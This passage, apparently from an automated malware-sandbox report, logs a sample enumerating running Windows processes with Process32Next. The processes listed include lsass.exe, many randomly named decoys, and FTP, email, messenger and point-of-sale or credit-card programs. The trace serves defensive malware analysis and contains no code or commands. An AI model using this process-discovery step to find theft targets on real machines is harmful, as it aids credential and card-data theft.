th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0182.070] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.071] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.073] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0182.075] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.119] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.121] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.122] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.124] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.125] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.127] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.129] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0182.130] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0182.132] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.133] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0182.134] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.139] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0182.141] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0182.143] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0182.144] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0182.146] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0182.147] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0182.148] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.150] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0182.152] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0182.153] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0182.155] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0182.197] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.199] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0182.201] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0182.202] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0182.204] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0182.205] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0182.206] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0182.208] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0182.209] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0182.211] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0182.212] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0182.214] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0182.215] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0182.216] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0182.218] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0182.220] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0182.221] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0182.223] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0182.224] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0182.226] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0182.227] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0182.229] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0182.272] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0182.275] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0182.277] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0182.279] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0182.282] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0182.284] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0182.286] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0182.288] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0182.290] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0182.292] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0182.294] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0182.296] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0182.298] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0182.300] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0182.302] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0182.303] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0182.305] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0182.344] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0182.347] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0182.348] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0182.350] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0182.352] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0182.354] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0182.356] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0182.358] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0182.363] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0182.365] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0182.366] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0182.368] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0182.370] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0182.371] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0182.373] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0182.375] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0182.377] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, 